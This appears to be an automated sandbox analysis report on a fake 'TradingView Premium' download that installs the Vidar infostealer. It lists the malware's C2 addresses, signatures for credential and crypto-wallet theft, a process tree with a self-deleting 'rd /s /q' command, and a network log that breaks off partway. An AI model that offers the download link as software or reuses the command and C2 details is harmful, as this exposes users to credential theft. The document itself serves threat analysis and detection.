Resubmissions

05-10-2024 20:28

241005-y9al4awgnc 10

05-10-2024 20:22

241005-y5s8ms1gkm 10

Analysis

  • max time kernel
    92s
  • max time network
    244s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05-10-2024 20:22

General

  • Target

    https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip

Malware Config

Extracted

Family

vidar

Version

11

Botnet

dd3c663b33910bd77937a09a739dc3d6

C2

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Signatures

  • Detect Vidar Stealer 8 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 59 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3340
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb4051cc40,0x7ffb4051cc4c,0x7ffb4051cc58
      2⤵
        PID:3348
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1800 /prefetch:2
        2⤵
          PID:2632
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2104 /prefetch:3
          2⤵
            PID:5028
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2380 /prefetch:8
            2⤵
              PID:1412
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3088 /prefetch:1
              2⤵
                PID:3480
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3056,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3112 /prefetch:1
                2⤵
                  PID:4220
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4760,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4772 /prefetch:8
                  2⤵
                    PID:2956
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4496,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5056 /prefetch:8
                    2⤵
                    • NTFS ADS
                    PID:1288
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=212,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5016 /prefetch:8
                    2⤵
                      PID:2856
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4796,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5024 /prefetch:8
                      2⤵
                        PID:4748
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5168 /prefetch:3
                        2⤵
                          PID:1292
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5012,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5040 /prefetch:8
                          2⤵
                            PID:1652
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5152,i,6592781998189689645,18360468680737787919,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4936 /prefetch:3
                            2⤵
                              PID:3420
                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                            1⤵
                              PID:988
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                              1⤵
                                PID:3960
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:4184
                                • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
                                  "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
                                  1⤵
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4572
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIDBKKKKKFBG" & exit
                                    2⤵
                                      PID:1008
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 10
                                        3⤵
                                        • Delays execution with timeout.exe
                                        PID:780
                                  • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
                                    "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
                                    1⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2752
                                  • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
                                    "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
                                    1⤵
                                      PID:1668
                                    • C:\Windows\system32\taskmgr.exe
                                      "C:\Windows\system32\taskmgr.exe" /0
                                      1⤵
                                        PID:788
                                      • C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe
                                        "C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"
                                        1⤵
                                          PID:2544

                                        Network

                                        • flag-us
                                          DNS
                                          coincapy.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          coincapy.com
                                          IN A
                                          Response
                                          coincapy.com
                                          IN A
                                          172.67.154.80
                                          coincapy.com
                                          IN A
                                          104.21.64.186
                                        • flag-us
                                          DNS
                                          10.169.217.172.in-addr.arpa
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          10.169.217.172.in-addr.arpa
                                          IN PTR
                                          Response
                                          10.169.217.172.in-addr.arpa
                                          IN PTR
                                          lhr25s26-in-f101e100net
                                        • flag-us
                                          DNS
                                          67.169.217.172.in-addr.arpa
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          67.169.217.172.in-addr.arpa
                                          IN PTR
                                          Response
                                          67.169.217.172.in-addr.arpa
                                          IN PTR
                                          lhr48s09-in-f31e100net
                                        • flag-us
                                          DNS
                                          crl.usertrust.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          crl.usertrust.com
                                          IN A
                                          Response
                                          crl.usertrust.com
                                          IN CNAME
                                          crl.comodoca.com.cdn.cloudflare.net
                                          crl.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          104.18.38.233
                                          crl.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          172.64.149.23
                                        • flag-us
                                          DNS
                                          ocsp.comodoca.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          ocsp.comodoca.com
                                          IN A
                                          Response
                                          ocsp.comodoca.com
                                          IN CNAME
                                          ocsp.comodoca.com.cdn.cloudflare.net
                                          ocsp.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          104.18.38.233
                                          ocsp.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          172.64.149.23
                                        • flag-us
                                          DNS
                                          ocsp.digicert.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          ocsp.digicert.com
                                          IN A
                                          Response
                                          ocsp.digicert.com
                                          IN CNAME
                                          ocsp.edge.digicert.com
                                          ocsp.edge.digicert.com
                                          IN CNAME
                                          fp2e7a.wpc.2be4.phicdn.net
                                          fp2e7a.wpc.2be4.phicdn.net
                                          IN CNAME
                                          fp2e7a.wpc.phicdn.net
                                          fp2e7a.wpc.phicdn.net
                                          IN A
                                          192.229.221.95
                                        • flag-us
                                          DNS
                                          nexusrules.officeapps.live.com
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          nexusrules.officeapps.live.com
                                          IN A
                                          Response
                                          nexusrules.officeapps.live.com
                                          IN CNAME
                                          prod.nexusrules.live.com.akadns.net
                                          prod.nexusrules.live.com.akadns.net
                                          IN A
                                          52.111.243.29
                                        • flag-us
                                          DNS
                                          251.206.132.45.in-addr.arpa
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          251.206.132.45.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          172.214.232.199.in-addr.arpa
                                          chrome.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          172.214.232.199.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          GET
                                          https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip
                                          chrome.exe
                                          Remote address:
                                          172.67.154.80:443
                                          Request
                                          GET /tradingview_premium/TradingView_Premium_Desktop.zip HTTP/2.0
                                          host: coincapy.com
                                          sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          upgrade-insecure-requests: 1
                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                          accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          sec-fetch-site: none
                                          sec-fetch-mode: navigate
                                          sec-fetch-user: ?1
                                          sec-fetch-dest: document
                                          accept-encoding: gzip, deflate, br, zstd
                                          accept-language: en-US,en;q=0.9
                                          Response
                                          HTTP/2.0 200
                                          date: Sat, 05 Oct 2024 20:22:46 GMT
                                          content-type: application/zip
                                          content-length: 139062018
                                          last-modified: Fri, 04 Oct 2024 07:48:29 GMT
                                          x-turbo-charged-by: LiteSpeed
                                          cache-control: max-age=14400
                                          cf-cache-status: REVALIDATED
                                          accept-ranges: bytes
                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TKwqAwNG9cUWeYD0RhRwucJxW%2B9yua1XaIcXEx9jWT5t5fpn5z2ZeuWxCaR9ZOtzOee2OytMpTwjh%2FMaRwYU7C25ZLhwkFlepd4MwbG%2F5XpewLzBKdOupuMZTaCmqkY%3D"}],"group":"cf-nel","max_age":604800}
                                          nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          vary: Accept-Encoding
                                          server: cloudflare
                                          cf-ray: 8ce020280e41539f-LHR
                                        • flag-us
                                          DNS
                                          80.154.67.172.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          80.154.67.172.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          ctldl.windowsupdate.com
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          ctldl.windowsupdate.com
                                          IN A
                                          Response
                                          ctldl.windowsupdate.com
                                          IN CNAME
                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                          IN CNAME
                                          wu-b-net.trafficmanager.net
                                          wu-b-net.trafficmanager.net
                                          IN CNAME
                                          bg.microsoft.map.fastly.net
                                          bg.microsoft.map.fastly.net
                                          IN A
                                          199.232.210.172
                                          bg.microsoft.map.fastly.net
                                          IN A
                                          199.232.214.172
                                        • flag-us
                                          DNS
                                          172.210.232.199.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          172.210.232.199.in-addr.arpa
                                          IN PTR
                                          Response
                                        • flag-us
                                          DNS
                                          crl.comodoca.com
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          crl.comodoca.com
                                          IN A
                                          Response
                                          crl.comodoca.com
                                          IN CNAME
                                          crl.comodoca.com.cdn.cloudflare.net
                                          crl.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          104.18.38.233
                                          crl.comodoca.com.cdn.cloudflare.net
                                          IN A
                                          172.64.149.23
                                        • flag-us
                                          DNS
                                          109.234.82.104.in-addr.arpa
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          109.234.82.104.in-addr.arpa
                                          IN PTR
                                          Response
                                          109.234.82.104.in-addr.arpa
                                          IN PTR
                                          a104-82-234-109deploystaticakamaitechnologiescom
                                        • flag-us
                                          DNS
                                          cowod.hopto.org
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          cowod.hopto.org
                                          IN A
                                          Response
                                          cowod.hopto.org
                                          IN A
                                          45.132.206.251
                                        • flag-us
                                          DNS
                                          ctldl.windowsupdate.com
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          ctldl.windowsupdate.com
                                          IN A
                                          Response
                                          ctldl.windowsupdate.com
                                          IN CNAME
                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                          ctldl.windowsupdate.com.delivery.microsoft.com
                                          IN CNAME
                                          wu-b-net.trafficmanager.net
                                          wu-b-net.trafficmanager.net
                                          IN CNAME
                                          bg.microsoft.map.fastly.net
                                          bg.microsoft.map.fastly.net
                                          IN A
                                          199.232.214.172
                                          bg.microsoft.map.fastly.net
                                          IN A
                                          199.232.210.172
                                        • flag-us
                                          DNS
                                          steamcommunity.com
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          steamcommunity.com
                                          IN A
                                          Response
                                          steamcommunity.com
                                          IN A
                                          104.82.234.109
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:48 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6286
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b1afe59541-LHR
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Cache-Control: no-cache
                                          Connection: Keep-Alive
                                          Pragma: no-cache
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:48 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6286
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b218509541-LHR
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2%2BiPob4twryIF%2BFfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa%2FLgCEBBwnU%2F1VAjXMGAB2OqRdbs%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2%2BiPob4twryIF%2BFfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa%2FLgCEBBwnU%2F1VAjXMGAB2OqRdbs%3D HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:49 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 2030
                                          Connection: keep-alive
                                          Last-Modified: Thu, 03 Oct 2024 16:58:04 GMT
                                          Expires: Thu, 10 Oct 2024 16:58:03 GMT
                                          Etag: "57e3b1b8b0b2cf7adf3dc05c2563cc8c2a2de222"
                                          Cache-Control: max-age=602798,s-maxage=1800,public,no-transform,must-revalidate
                                          X-CCACDN-Proxy-ID: mcdpinlb1
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 1180
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b37a1e9541-LHR
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:24:23 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6321
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce0228b1ce69541-LHR
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Cache-Control: no-cache
                                          Connection: Keep-Alive
                                          Pragma: no-cache
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:24:23 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6321
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce0228bfdc69541-LHR
                                        • flag-us
                                          GET
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /AddTrustExternalCARoot.crl HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: crl.usertrust.com
                                          Response
                                          HTTP/1.1 404 Not Found
                                          Date: Sat, 05 Oct 2024 20:23:48 GMT
                                          Content-Length: 0
                                          Connection: keep-alive
                                          CF-Cache-Status: HIT
                                          Age: 156
                                          Server: cloudflare
                                          CF-RAY: 8ce021b30a835327-LHR
                                        • flag-us
                                          GET
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /AddTrustExternalCARoot.crl HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: crl.usertrust.com
                                          Response
                                          HTTP/1.1 404 Not Found
                                          Date: Sat, 05 Oct 2024 20:24:23 GMT
                                          Content-Length: 0
                                          Connection: keep-alive
                                          CF-Cache-Status: HIT
                                          Age: 10
                                          Server: cloudflare
                                          CF-RAY: 8ce0228cbc185327-LHR
                                        • flag-us
                                          GET
                                          http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.comodoca.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:49 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 510
                                          Connection: keep-alive
                                          Last-Modified: Thu, 03 Oct 2024 18:47:25 GMT
                                          Expires: Thu, 10 Oct 2024 18:47:24 GMT
                                          Etag: "d859838c13fcdd995abf47dc8580cac76787ee82"
                                          Cache-Control: max-age=604034,s-maxage=1800,public,no-transform,must-revalidate
                                          X-CCACDN-Proxy-ID: mcdpinlb1
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 485
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b48f5476d5-LHR
                                        • flag-us
                                          GET
                                          http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO HTTP/1.1
                                          Cache-Control: no-cache
                                          Connection: Keep-Alive
                                          Pragma: no-cache
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.comodoca.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:49 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 510
                                          Connection: keep-alive
